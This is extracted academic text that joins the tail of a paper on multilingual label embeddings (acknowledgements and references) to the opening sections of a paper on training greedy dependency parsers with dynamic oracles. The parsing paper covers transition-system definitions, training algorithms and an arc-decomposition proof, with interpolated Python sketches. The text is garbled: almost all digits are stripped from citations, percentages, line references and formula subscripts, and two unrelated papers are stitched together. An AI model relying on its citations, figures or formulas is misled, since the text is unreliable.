we are grateful for the support from the european union through its horizon program in the summa project n. , see http://www.summa-project.eu. we would also like to thank our action editor, eneko agirre, and the anonymous reviewers for their invaluable suggestions and feedback.

references
waleed ammar, george mulcaire, yulia tsvetkov, guillaume lample, chris dyer, and noah a. smith. . massively multilingual word embeddings. corr, abs/ . .v .
isabelle augenstein, sebastian ruder, and anders søgaard. . multi-task learning of pairwise sequence classification tasks over disparate label spaces. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, louisiana.
david belanger and andrew mccallum. . structured prediction energy networks. in proceedings of the rd international conference on machine learning, volume of proceedings of machine learning research, pages – , new york, new york, usa. pmlr.
jianshu chen, ji he, yelong shen, lin xiao, xiaodong he, jianfeng gao, xinying song, and li deng. . end-to-end learning of lda by mirror-descent back propagation over a deep architecture. in advances in neural information processing systems , pages – , montreal, canada.
kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar.
ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. journal of machine learning research, : – .
yann n. dauphin, gökhan tür, dilek hakkani-tür, and larry p. heck. . zero-shot learning and clustering for semantic utterance classification. in international conference on learning representations, banff, canada.
orhan firat, baskaran sankaran, yaser al-onaizan, fatos t. yarman vural, and kyunghyun cho. .
zero-resource translation with multi-lingual neural machine translation. in proceedings of the conference on empirical methods in natural language processing, pages – , austin, usa.
andrea frome, greg s. corrado, jon shlens, samy bengio, jeff dean, marc aurelio ranzato, and tomas mikolov. . devise: a deep visual-semantic embedding model. in c. j. c. burges, l. bottou, m. welling, z. ghahramani, and k. q. weinberger, editors, advances in neural information processing systems , pages – . curran associates, inc.
yanwei fu, tao xiang, yu-gang jiang, xiangyang xue, leonid sigal, and shaogang gong. . recent advances in zero-shot recognition: toward data-efficient understanding of visual content. ieee signal processing magazine, ( ): – .
rie johnson and tong zhang. . effective use of word order for text categorization with convolutional neural networks. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , denver, colorado.
yoon kim. . convolutional neural networks for sentence classification. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar.
alexandre klementiev, ivan titov, and binod bhattarai. . inducing crosslingual distributed representations of words. in proceedings of coling , pages – , mumbai, india.
ankit kumar, ozan irsoy, jonathan su, james bradbury, robert english, brian pierce, peter ondruska, ishaan gulrajani, and richard socher. . ask me anything: dynamic memory networks for natural language processing. in proceedings of the rd international conference on machine learning, pages – , new york city, usa.
siwei lai, liheng xu, kang liu, and jun zhao. . recurrent convolutional neural networks for text classification. in proceedings of the th aaai conference on artificial intelligence, pages – , austin, usa.
quoc v. le and tomas mikolov. . distributed representations of sentences and documents. in proceedings of the st international conference on machine learning, pages – , beijing, china.
yann lecun, sumit chopra, raia hadsell, fu jie huang, et al. . a tutorial on energy-based learning. in predicting structured data. mit press.
jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural machine translation without explicit segmentation. transactions of the association for computational linguistics, : – .
rui lin, shujie liu, muyun yang, mu li, ming zhou, and sheng li. . hierarchical recurrent neural network for document modeling. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal.
thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in
proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal.
thomas mensink, jakob verbeek, florent perronnin, and gabriela csurka. . metric learning for large scale image classification: generalizing to new classes at near-zero cost. in computer vision - eccv , pages – , berlin, heidelberg. springer berlin heidelberg.
tomas mikolov, ilya sutskever, kai chen, greg s. corrado, and jeff dean. . distributed representations of words and phrases and their compositionality. in c. j. c. burges, l. bottou, m. welling, z. ghahramani, and k. q. weinberger, editors, advances in neural information processing systems , pages – . curran associates, inc.
frederic morin and yoshua bengio. . hierarchical probabilistic neural network language model. in proceedings of the tenth international workshop on artificial intelligence and statistics, pages – .
khalil mrini, nikolaos pappas, and andrei popescu-belis. . cross-lingual transfer for news article labeling: benchmarking statistical and neural models. idiap research report, idiap-rr- - .
jinseok nam, eneldo loza mencía, and johannes fürnkranz. . all-in text: learning document, label, and word representations jointly. in proceedings of the th aaai conference on artificial intelligence, aaai' , pages – , phoenix, arizona.
mohammad norouzi, tomas mikolov, samy bengio, yoram singer, jonathon shlens, andrea frome, greg corrado, and jeffrey dean. . zero-shot learning by convex combination of semantic embeddings. in international conference on learning representations, banff, canada.
bo pang and lillian lee. . seeing stars: exploiting class relationships for sentiment categorization with respect to rating scales. in proceedings of the rd annual meeting of the association for computational linguistics, pages – , ann arbor, michigan.
nikolaos pappas, lesly miculicich, and james henderson. . beyond weight tying: learning joint input-output embeddings for neural machine translation. in proceedings of the third conference on machine translation: research papers, pages – , brussels, belgium. association for computational linguistics.
nikolaos pappas and andrei popescu-belis. . multilingual hierarchical attention networks for document classification. in proceedings of the eighth international joint conference on natural language processing (volume : long papers), pages – .
alexander m. rush, sumit chopra, and jason weston. .
a neural attention model for abstractive sentence summarization. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal.
rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , berlin, germany.
lei shu, hu xu, and bing liu. . doc: deep open classification of text documents. in proceedings of the conference on empirical methods in natural language processing, pages – , copenhagen, denmark. association for computational linguistics.
richard socher, milind ganjoo, christopher d. manning, and andrew y. ng. . zero-shot learning through cross-modal transfer. in proceedings of the th international conference on neural information processing systems, nips' , pages – , lake tahoe, nevada.
vivek srikumar and christopher d. manning. . learning distributed representations for structured output prediction. in proceedings of the th international conference on neural information processing systems, volume , nips' , pages – , cambridge, ma, usa. mit press.
duyu tang, bing qin, and ting liu. . document modeling with gated recurrent neural network for sentiment classification. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. association for computational linguistics.
guoyin wang, chunyuan li, wenlin wang, yizhe zhang, dinghan shen, xinyuan zhang, ricardo henao, and lawrence carin. . joint embedding of words and labels for text classification.
in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . association for computational linguistics.
jason weston, samy bengio, and nicolas usunier. . large scale image annotation: learning to rank with joint word-image embeddings. machine learning, ( ): – .
jason weston, samy bengio, and nicolas usunier. . wsabie: scaling up to large vocabulary image annotation. in proceedings of the twenty-second international joint conference on artificial intelligence (volume ), pages – , barcelona, spain.
zichao yang, diyi yang, chris dyer, xiaodong he, alex smola, and eduard hovy. . hierarchical attention networks for document classification. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , san diego, california.
majid yazdani and james henderson. . a model of zero-shot learning of spoken language understanding. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal.
chih-kuan yeh, wei-chieh wu, wei-jen ko, and yu-chiang frank wang. . learning deep latent spaces for multi-label classification. in proceedings of the nd aaai conference on artificial intelligence, new orleans, usa.
xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in advances in neural information processing systems , pages – , montreal, canada.
yang zhang, boqing gong, and mubarak shah. . fast zero-shot image tagging. in proceedings of the ieee conference on computer vision and pattern recognition, las vegas, usa.

training deterministic parsers with non-deterministic oracles

yoav goldberg, bar-ilan university, department of computer science, ramat-gan, israel, yoav.goldberg@gmail.com
joakim nivre, uppsala university, department of linguistics and philology, uppsala, sweden, joakim.nivre@lingfil.uu.se

abstract
greedy transition-based parsers are very fast but tend to suffer from error propagation. this problem is aggravated by the fact that they are normally trained using oracles that are deterministic and incomplete in the sense that they assume a unique canonical path through the transition system and are only valid as long as the parser does not stray from this path.
in this paper, we give a general characterization of oracles that are nondeterministic and com- plete, present a method for deriving such ora- cles for transition systems that satisfy a prop- erty we call arc decomposition, and instanti- ate this method for three well-known transi- tion systems from the literature. we say that these oracles are dynamic, because they allow us to dynamically explore alternative and non- optimal paths during training – in contrast to oracles that statically assume a unique optimal path. experimental evaluation on a wide range of data sets clearly shows that using dynamic oracles to train greedy parsers gives substan- tial improvements in accuracy. moreover, this improvement comes at no cost in terms of efficiency, unlike other techniques like beam search. introduction greedy transition-based parsers are easy to imple- ment and are very efficient, but they are generally not as accurate as parsers that are based on global search (mcdonald et al., ; koo and collins, ) or as transition-based parsers that use beam search (zhang and clark, ) or dynamic pro- gramming (huang and sagae, ; kuhlmann et al., ). this work is part of a line of research trying to push the boundaries of greedy parsing and narrow the accuracy gap of – % between search- based and greedy parsers, while maintaining the ef- ficiency and incremental nature of greedy parsers. one reason for the lower accuracy of greedy parsers is error propagation: once the parser makes an error in decoding, more errors are likely to fol- low. this behavior is closely related to the way in which greedy parsers are normally trained. given a treebank oracle, a gold sequence of transitions is derived, and a predictor is trained to predict transi- tions along this gold sequence, without considering any parser state outside this sequence. thus, once the parser strays from the golden path at test time, it ventures into unknown territory and is forced to react to situations it has never been trained for. in recent work (goldberg and nivre, ), we introduced the concept of a dynamic oracle, which is non-deterministic and not restricted to a single golden path, but instead provides optimal predic- tions for any possible state the parser might be in. dynamic oracles are non-deterministic in the sense that they return a set of valid transitions for a given parser state and gold tree. moreover, they are well- defined and optimal also for states from which the gold tree cannot be derived, in the sense that they return the set of transitions leading to the best tree derivable from each state. we showed experimen- tally that, using a dynamic oracle for the arc-eager transition system (nivre, ), a greedy parser can be trained to perform well also after incurring a mis- take, thus alleviating the effect of error propagation and resulting in consistently better parsing accuracy. transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; published / . c© association for computational linguistics. in this paper, we extend the work of goldberg and nivre ( ) by giving a general characteri- zation of dynamic oracles as oracles that are non- deterministic, in that they return sets of transitions, and complete, in that they are defined for all possible states. we then define a formal property of transition systems which we call arc decomposition, and in- troduce a framework for deriving dynamic oracles for arc-decomposable systems. 
using this frame- work, we derive novel dynamic oracles for the hy- brid (kuhlmann et al., ) and easy-first (gold- berg and elhadad, ) transition systems, which are arc-decomposable (as is the arc-eager system). we also show that the popular arc-standard system (nivre, ) is not arc-decomposable, and so deriv- ing a dynamic oracle for it remains an open research question. finally, we perform a set of experiments on the conll data sets, validating that the use of dynamic oracles for exploring states that result from parsing mistakes during training is beneficial across transition systems. transition-based dependency parsing we begin with a quick review of transition-based dependency parsing, presenting the arc-eager, arc- standard, hybrid and easy-first transitions systems in a common notation. the transition-based pars- ing framework (nivre, ) assumes a transition system, an abstract machine that processes sentences and produces parse trees. the transition system has a set of configurations and a set of transitions which are applied to configurations. when parsing a sen- tence, the system is initialized to an initial configu- ration based on the input sentence, and transitions are repeatedly applied to this configuration. after a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. in a greedy parser, a clas- sifier is used to choose the transition to take in each configuration, based on features extracted from the configuration itself. transition systems differ by the way they define configurations, and by the particular set of transitions available. . dependency trees we define a dependency tree for a sentence w = w , . . . ,wn to be a labeled directed tree t = (v,a), where v = {w , . . . ,wn} is a set of nodes given by the tokens of the input sentence, and a ⊆ v ×l×v (for some dependency label set l) is a set of labeled directed arcs of the form (h,lb,d), where h ∈ v is said to be the head, d ∈ v the dependent, and lb ∈ l the dependency label. when dealing with unlabeled parsing, or when the label identity is irrelevant, we take a ⊆ v × v to be a set of ordinary directed arcs of the form (h,d). note that, since the nodes of the tree are given by the input sentence, a dependency tree t = (v,a) for a sentence w is uniquely defined by the arc set a. for convenience, we will therefore equate the tree with the arc set and and use the symbol t for the latter, reserving the symbol a for arc sets that are not necessarily trees. in the context of this work it is assumed that all the dependency trees are projective. although the general definition of a dependency tree does not make any assumptions about which node is the root of the tree, it is common practice in dependency parsing to add a dummy node root, which is prefixed or suffixed to the sentence and which always acts as the root of the tree. we will follow this practice in our description of different transition systems below. . transition systems arc-eager in the arc-eager system (nivre, ), a configuration c = (σ,β,a) consists of a stack σ, a buffer β, and a set a of dependency arcs. given a sentence w = w , . . . ,wn, the system is initialized with an empty stack, an empty arc set, and β = w , . . . ,wn, root, where root is the special root node. any configuration c with an empty stack and a buffer containing only root is terminal, and the parse tree is given by the arc set ac of c. 
the system has four transitions, shift, right_lb, left_lb and reduce, defined as follows:

shift[(σ, b|β, a)] = (σ|b, β, a)
right_lb[(σ|s, b|β, a)] = (σ|s|b, β, a ∪ {(s, lb, b)})
left_lb[(σ|s, b|β, a)] = (σ, b|β, a ∪ {(b, lb, s)})
reduce[(σ|s, β, a)] = (σ, β, a)

we use σ|x to denote a stack with top element x and remainder σ, and x|β to denote a buffer with head x followed by the elements in β. (this definition of a terminal configuration differs from that in nivre ( ) but guarantees that the set ac is a dependency tree rooted in root.) there is a precondition on the right and shift transitions to be legal only when b ≠ root, and on left, right and reduce to be legal only when the stack is non-empty. moreover, left is only legal when s does not have a parent in a, and reduce only when s does have a parent in a. in general, we use legal(c) to refer to the set of transitions that are legal in a configuration c. the arc-eager system builds trees eagerly in the sense that arcs are added at the earliest time possible. in addition, each word collects all of its left dependents before collecting its right dependents.

arc-standard  the arc-standard system (nivre, ) has configurations of the same form c = (σ, β, a) as the arc-eager system. the initial configuration for a sentence w = w1, . . . , wn has an empty stack and arc set and β = root, w1, . . . , wn. a configuration c is terminal if it has an empty buffer and a stack containing the single node root; the parse tree is given by ac. the system has three transitions, shift, right_lb and left_lb, defined as follows:

shift[(σ, b|β, a)] = (σ|b, β, a)
right_lb[(σ|s1|s0, β, a)] = (σ|s1, β, a ∪ {(s1, lb, s0)})
left_lb[(σ|s1|s0, β, a)] = (σ|s0, β, a ∪ {(s0, lb, s1)})

there is a precondition on the left transition to be legal only when s1 ≠ root, and on left and right to be legal only when the stack has at least two elements. the arc-standard system builds trees in a bottom-up fashion: each word must collect all its dependents before being attached to its head. the system does not pose any restriction on the order in which left and right dependents are collected.

hybrid  the hybrid system (kuhlmann et al., ) has the same configurations and the same initialization and termination conditions as the arc-standard system. the system has three transitions, shift, right_lb and left_lb, defined as follows:

shift[(σ, b|β, a)] = (σ|b, β, a)
right_lb[(σ|s1|s0, β, a)] = (σ|s1, β, a ∪ {(s1, lb, s0)})
left_lb[(σ|s, b|β, a)] = (σ, b|β, a ∪ {(b, lb, s)})

there is a precondition on right to be legal only when the stack has at least two elements, and on left to be legal only when the stack is non-empty and s ≠ root. the hybrid system can be seen as a combination of the arc-standard and arc-eager systems, using the left action of arc-eager and the right action of arc-standard. like arc-standard, it builds trees bottom-up; but like arc-eager, it requires a word to collect all its left dependents before collecting any right dependent.

easy-first  in the easy-first system (goldberg and elhadad, ), a configuration c = (λ, a) consists of a list λ and a set a of dependency arcs. we use li to denote the ith member of λ and write |λ| for the length of λ. given a sentence w = w1, . . . , wn, the system is initialized with an empty arc set and λ = root, w1, . . . , wn. a configuration c is terminal with parse tree ac if λ = root.
the set of transitions for a given configuration c = (λ, a) is {left^i_lb | 1 < i ≤ |λ|} ∪ {right^i_lb | 1 ≤ i < |λ|}, where:

left^i_lb[(λ, a)] = (λ \ {l_{i-1}}, a ∪ {(l_i, lb, l_{i-1})})
right^i_lb[(λ, a)] = (λ \ {l_{i+1}}, a ∪ {(l_i, lb, l_{i+1})})

there is a precondition on left^i transitions to only trigger if l_{i-1} ≠ root. unlike the arc-eager, arc-standard and hybrid transition systems, which work in a left-to-right order and access the sentence incrementally, the easy-first system is non-directional and has access to the entire sentence at each step. like the arc-standard and hybrid systems, it builds trees bottom-up.

. greedy transition-based parsing
assuming that we have a feature-extraction function φ(c, t) over configurations c and transitions t, and a weight vector w assigning weights to each feature, greedy transition-based parsing is very simple and efficient using algorithm .

algorithm  greedy transition-based parsing
1: input: sentence w, parameter vector w
2: c ← initial(w)
3: while not terminal(c) do
4:   tp ← arg max_{t ∈ legal(c)} w · φ(c, t)
5:   c ← tp(c)
6: return ac

starting in the initial configuration for a given sentence, we repeatedly choose the highest-scoring transition according to our model and apply it, until we reach a terminal configuration, at which point we stop and return the parse tree accumulated in the configuration.
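to make the transition-system definitions and the greedy loop of algorithm concrete, here is a small, self-contained python sketch of an unlabeled arc-eager system together with the greedy parser. all names (Config, legal, greedy_parse, the toy feature extractor) are our own illustrative choices rather than code from the paper, and the weight vector is assumed to come from some trained model.

```python
from dataclasses import dataclass, field

ROOT = 0  # index of the artificial root node

@dataclass
class Config:
    """an arc-eager configuration: a stack, a buffer and a set of (head, dependent) arcs."""
    stack: list
    buffer: list
    arcs: set = field(default_factory=set)

def initial(n_words):
    # words are numbered 1..n; arc-eager places the root node at the end of the buffer
    return Config(stack=[], buffer=list(range(1, n_words + 1)) + [ROOT])

def is_terminal(c):
    return not c.stack and c.buffer == [ROOT]

def has_head(c, node):
    return any(d == node for (_, d) in c.arcs)

# the four arc-eager transitions; each returns a new configuration
def shift(c):
    return Config(c.stack + [c.buffer[0]], c.buffer[1:], set(c.arcs))

def right_arc(c):  # attach buffer front b as dependent of stack top s, then push b
    s, b = c.stack[-1], c.buffer[0]
    return Config(c.stack + [b], c.buffer[1:], c.arcs | {(s, b)})

def left_arc(c):   # attach stack top s as dependent of buffer front b, then pop s
    s, b = c.stack[-1], c.buffer[0]
    return Config(c.stack[:-1], c.buffer, c.arcs | {(b, s)})

def reduce_(c):    # pop a stack top that already has a head
    return Config(c.stack[:-1], c.buffer, set(c.arcs))

def legal(c):
    """the preconditions described in the text, for the unlabeled case."""
    moves = []
    if c.buffer and c.buffer[0] != ROOT:
        moves.append(shift)
        if c.stack:
            moves.append(right_arc)
    if c.stack and c.buffer and not has_head(c, c.stack[-1]):
        moves.append(left_arc)
    if c.stack and has_head(c, c.stack[-1]):
        moves.append(reduce_)
    return moves

def greedy_parse(n_words, weights, features):
    """greedy transition-based parsing: follow the highest-scoring legal
    transition until a terminal configuration is reached."""
    c = initial(n_words)
    while not is_terminal(c):
        scored = [(sum(weights.get(f, 0.0) for f in features(c, t)), t)
                  for t in legal(c)]
        _, best = max(scored, key=lambda x: x[0])
        c = best(c)
    return c.arcs  # the predicted (head, dependent) arcs

# toy usage with an untrained model and a trivial feature extractor
def toy_features(c, t):
    top = c.stack[-1] if c.stack else None
    front = c.buffer[0] if c.buffer else None
    return ["%s~s=%s~b=%s" % (t.__name__, top, front)]

print(greedy_parse(3, {}, toy_features))
```

returning a fresh Config from every transition keeps the transitions side-effect free, which is convenient later when training explores configurations that lie off the oracle path.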
traditionally, the oracles for the left-to-right sys- tems are static: they return a single correct transition and are only correct for configurations that result from transitions predicted by the oracle itself. the oracle for the easy-first system is non-deterministic and returns a set of correct transitions. however, like the static oracle, it is correct only for configurations from which the gold tree is reachable. thus, in both cases, we need to make sure that a transition is ap- plied during training only if it is considered correct by the oracle; else we cannot guarantee that later or- acle predictions will be correct. therefore, on line , we either remain in the same configuration (easy- first) or follow the oracle prediction and go to to(c) (left-to-right systems); on line , we in fact also go to to(c), because in this case we have tp(c) = to(c). a notable shortcoming of this training procedure is that, at parsing time, the parsing model may pre- dict incorrect transitions and reach configurations that are not on the oracle path. since the model has never seen such configurations during training, it is likely to perform badly in them, making further mis- takes more likely. we would therefore like the parser to encounter configurations resulting from incorrect transitions during training and learn what constitutes optimal transitions in such configurations. unfortu- nately, this is not possible using the static (or even the non-deterministic) oracles. . training with exploration assuming we had access to an oracle that could tell us which transitions are optimal in any configura- tion, including ones from which the gold tree is not reachable, we could trivially change the training al- gorithm to incorporate learning on configurations that result from incorrect transitions, and thereby mitigate the effects of error propagation at pars- ing time. conceptually, all that we need to change is line . instead of following the prediction tp only when it is correct (line ), we could some- times choose to follow tp also when it is not correct. algorithm online training with exploration for greedy transition-based parsers (ith iteration) : for sentence w with gold tree t in corpus do : c ← initial(w) : while not terminal(c) do : correct(c) ←{t|o(t;c,t) = true} : tp ← arg maxt∈legal(c) w ·φ(c,t) : to ← arg maxt∈correct(c) w ·φ(c,t) : if tp ∈ correct(c) then : update(w,φ(c,to),φ(c,tp)) : c ← explorek,p(c,to, tp, i) : else : c ← tp(c) : function explorek,p(c, to, tp, i) : if i > k and rand() < p then : return tp(c) : else : return next(c,to) the rest of the training algorithm does not need to change, as the set correct(c) obtained in line would now include the set of optimal transitions to take from configurations reached by following the incorrect transition, as provided by the new oracle. following goldberg and nivre ( ), we call this approach learning with exploration. the modified training procedure is specified in algorithm . there are three major questions that need to be answered when implementing a concrete version of this algorithm: exploration policy when do we follow an incor- rect transition, and which one do we follow? optimality what constitutes an optimal transition in configurations from which the gold tree is not reachable? oracle given a definition of optimality, how do we calculate the set of optimal transitions in a given configuration? the first two questions are independent of the spe- cific transition system. 
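the modified procedure (algorithm 3) changes only what happens after an incorrect prediction: instead of always moving to the oracle configuration, an explore function may choose to follow the model's own (incorrect) transition. a sketch, reusing the score and update conventions of the previous sketch and assuming a complete (dynamic) oracle:

```python
def train_with_exploration(corpus, w, system, oracle, explore, iteration):
    """algorithm 3: online training with exploration of incorrect configurations."""
    for sentence, gold in corpus:
        c = system.initial(sentence)
        while not system.terminal(c):
            legal = system.legal(c)
            # with a *complete* (dynamic) oracle this set is meaningful even when
            # the gold tree is no longer reachable from c
            correct = [t for t in legal if oracle(t, c, gold)]
            t_p = max(legal, key=lambda t: score(w, system.phi(c, t)))
            t_o = max(correct, key=lambda t: score(w, system.phi(c, t)))
            if t_p not in correct:
                for f in system.phi(c, t_o):
                    w[f] = w.get(f, 0.0) + 1.0
                for f in system.phi(c, t_p):
                    w[f] = w.get(f, 0.0) - 1.0
                # the only change with respect to algorithm 2:
                c = explore(c, t_o, t_p, iteration, system)
            else:
                c = system.apply(t_p, c)
    return w
```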
in our experiments, we use a simple exploration policy, parameterized by an it- eration number k and a probability p. this policy always chooses an oracle transition during the first k iterations but later chooses the oracle transition with probability −p and the (possibly incorrect) model prediction otherwise. this is defined in the function explorek,p(c,to, tp, i) (called in line of algo- rithm ), which takes two additional arguments com- pared to algorithm : the model prediction tp and the current training iteration i. if i exceeds the iter- ation threshold k and if a randomly generated prob- ability does not exceed the probability threshold p, then the function returns tp(c), which means that we follow the (incorrect) model prediction. otherwise, it reverts to the old next(c,to) function, returning c for easy-first and to(c) for the other systems. we show in section that the training procedure is rel- atively insensitive to the choice of k and p values as long as predicted transitions are chosen often. our optimality criterion is directly related to the attachment score metrics commonly used to evaluate dependency parsers. we say that a transition t is optimal in a configuration c if and only if the best achievable attachment score from t(c) is equal to the best achievable attachment score from c. the implementation of oracles is specific to each transition system. in the next section, we first provide a characterization of complete non- deterministic oracles, also called dynamic oracles, which is what we require for the training procedure in algorithm . we then define a property of tran- sition systems which we call arc decomposition and present a general method for deriving complete non- deterministic oracles for arc-decomposable systems. finally, we use this method to derive concrete ora- cles for the arc-eager, hybrid and easy-first systems, which are all arc-decomposable. in section , we then show experimentally that we indeed achieve better parsing accuracy when using exploration dur- ing training. oracles for transition-based parsing almost all greedy transition-based parsers described in the literature are trained using what we call static oracles. we now make this notion precise and con- trast it with non-deterministic and complete oracles. following the terminology of goldberg and nivre the labeled attachment score (las) is the percentage of words in a sentence that are assigned both the correct head and the correct label. the unlabeled attachment score (uas) is the percentage of words that are assigned the correct head (regard- less of label). ( ), we reserve the term dynamic oracles for or- acles that are both non-deterministic and complete. . characterizing oracles during training, we assume that the oracle is a boolean function o(t;c,t), which returns true if and only if transition t is correct in configuration c for gold tree t (cf. algorithms – ). however, such a function may be defined in terms of different un- derlying functions that we also call oracles. a static oracle is a function os(t) mapping a tree t to a sequence of transitions t , . . . , tn. a static oracle is correct if starting in the initial con- figuration and applying the transitions in os(t) in order results in the transition system reaching a terminating configuration with parse tree t . for- mally, a static oracle is correct if and only if, for every projective dependency tree t with yield w , os(t) = t , . . . , tn, c = tn(. . .(t (initial(w)))), terminal(c) and ac = t . 
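the explore_{k,p} policy just described is a few lines of code; k and p are the two exploration parameters, and the fallback behaviour is the next_config function discussed earlier (the oracle move for the left-to-right systems, staying in place for easy-first). the random-number call is the standard library's; the system interface is an assumed, illustrative one.

```python
import random

def make_explore(k, p):
    """exploration policy explore_{k,p}: follow the oracle during the first k
    iterations; afterwards, follow the (possibly incorrect) model prediction
    with probability p and the oracle transition with probability 1 - p."""
    def explore(c, t_o, t_p, iteration, system):
        if iteration > k and random.random() < p:
            return system.apply(t_p, c)       # follow the model prediction
        return system.next_config(c, t_o)     # oracle move (or stay, for easy-first)
    return explore
```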
when using a static oracle for training in algorithm , the function o(t;c,t) returns true if os(t) = t , . . . , tn, c = ti− (. . .(t (initial(w)))) (for some i, ≤ i ≤ n) and t = ti. if t = ti, o(t;c,t) = false; if c = ti− (. . .(t (initial(w)))) (for all i, ≤ i ≤ n), o(t;c,t) is undefined. a static oracle is therefore essentially incomplete, because it is only defined for configurations that are part of the oracle path. static oracles either allow a single transition at a given con- figuration, or are undefined for that configuration. by contrast, a non-deterministic oracle is a func- tion on(c,t) mapping a configuration c and a tree t to a set of transitions. a non-deterministic ora- cle is correct if and only if, for every projective de- pendency tree t , every configuration c from which t is reachable, and every transition t ∈ on(c,t), t(c) is a configuration from which t is still reach- able. note that this definition of correctness for non-deterministic oracles is restricted to configura- tions from which a goal tree is reachable. non- since all the transition systems considered in this paper are restricted to projective dependency trees, we only define cor- rectness with respect to this class. there are obvious general- izations that apply to more expressive transition systems. static oracles are usually described as rules over parser configurations, i.e., “if the configuration is x take transition y”, giving the impressions they are functions from configurations to transitions. however, as explained here, these rules are only correct if the sequence of transitions is followed in its entirety. deterministic oracles are more flexible than static oracles in that they allow for spurious ambiguity: they support the possibility of different sequences of transitions leading to the gold tree. however, they are still only guaranteed to be correct on a subset of the possible configurations. thus, when using a non-deterministic oracle for training in algorithm , the function o(t;c,t) returns true if t is reachable from c and t ∈ on(c,t). however, if t is not reachable from c, o(t;c,t) is not necessarily well- defined. a complete non-deterministic oracle is a function od(c,t) for which this restriction is removed, so that correctness is defined over all configurations that are reachable from the initial configuration. follow- ing goldberg and nivre ( ), we call complete non-deterministic oracles dynamic. in order to de- fine correctness for dynamic oracles, we must first introduce a cost function c(a,t), which measures the cost of outputting parse a when the gold tree is t . in this paper, we define cost as hamming loss (for labeled or unlabeled dependency arcs), which is directly related to the attachment score metrics used to evaluate dependency parsers, but other cost functions are conceivable. we say that a complete non-deterministic oracle is correct if and only if, for every projective dependency tree t with yield w , every configuration c that is reachable from initial(w), and every transition t ∈ od(c,t), mina:c;a c(a,t) = mina:t(c);a c(a,t), where c ; a signifies that the parse a is reachable from c, a notion that will be formally defined in the next subsection. in other words, even if the gold tree t is no longer reachable itself, the best tree reachable from t(c) has the same cost as the best tree reachable from c. in addition to a cost function for arc sets and trees, it is convenient to define a cost function for transi- tions. 
we define c(t;c,t) to be the difference in cost between the best tree reachable from t(c) and c, respectively. that is: c(t;c,t) = min a:t(c);a c(a,t)− min a:c;a c(a,t) a dynamic oracle can then be defined as an oracle that returns the set of transitions with zero cost: od(c,t) = {t | c(t;c,t) = } . arc reachability and arc decomposition we now define the notion of reachability for parses (or arc sets), used already in the previous subsec- tion, and relate it to reachability for individual de- pendency arcs. this enables us to define a prop- erty of transition systems called arc decomposition, which is very useful when deriving dynamic oracles. arc reachability we say that a dependency arc (h,d) is reachable from a configuration c, writ- ten c ; (h,d), if there is a (possibly empty) se- quence of transitions t , . . . , tk such that (h,d) ∈ a(tk(...t (c))). in words, we require a sequence of transitions starting from c and leading to a configu- ration whose arc set contains (h,d). arc set reachability a set of dependency arcs a = {(h ,d ), . . . ,(hn,dn)} is reachable from a configuration c, written c ; a, if there is a (pos- sibly empty) sequence of transitions t , . . . , tk such that a ⊆ a(tk(...t (c))). in words, there is a sequence of transitions starting from c and leading to a config- uration where all arcs in a have been derived. tree consistency a set of arcs a is said to be tree consistent if there exists a projective dependency tree t such that a ⊆ t . arc decomposition a transition system is said to be arc decomposable if, for every tree consistent arc set a and configuration c, c ; a is entailed by c ; (h,d) for every arc (h,d) ∈ a. in words, if every arc in a tree consistent arc set is reachable from a configuration, then the entire arc set is also reachable from that configuration. arc decomposition is a powerful property, allowing us to reduce reasoning about the reachability of arc sets or trees to reasoning about the reachability of individual arcs, and will later use this property to derive dynamic oracles for the arc-eager, hybrid and easy-first systems. we consider unlabeled arcs here in order to keep notation simple. everything is trivially extendable to the labeled case. . proving arc decomposition let us now sketch how arc decomposition can be proven for the transition systems in consideration. arc-eager for the arc-eager system, consider an arbitrary configuration c = (σ,β,a) and a tree- consistent arc set a′ such that all arcs are reachable from c. we can partition a′ into four sets, each of which is by necessity itself a tree-consistent arc-set: ( ) b = {(h,d) |h,d ∈ β} ( ) b = {(h,d) |h,d ∈ β} ( ) bh = {(h,d) |h ∈ β,d ∈ σ} ( ) bd = {(h,d) |d ∈ β,h ∈ σ} arcs in b are already in a and cannot interfere with other arcs. b is reachable by any sequence of transi- tions that derives a tree consistent with b for a sen- tence containing only the words in β. in deriving this tree, every node x involved in some arc in bh or bd must at least once be at the head of the buffer. let cx be the first such configuaration. from cx, every arc (x,d) ∈ bh can be derived without in- terfering with arcs in a′ by a sequence of reduce and left-arclb transitions. this sequence of tran- sitions will trivially not interfere with other arcs in bh. moreover, it will not interfere with arcs in bd because a′ is tree consistent and projectivity ensures that an arc of the form (y,z) (y ∈ σ,z ∈ β) must satisfy y < d < x ≤ z. 
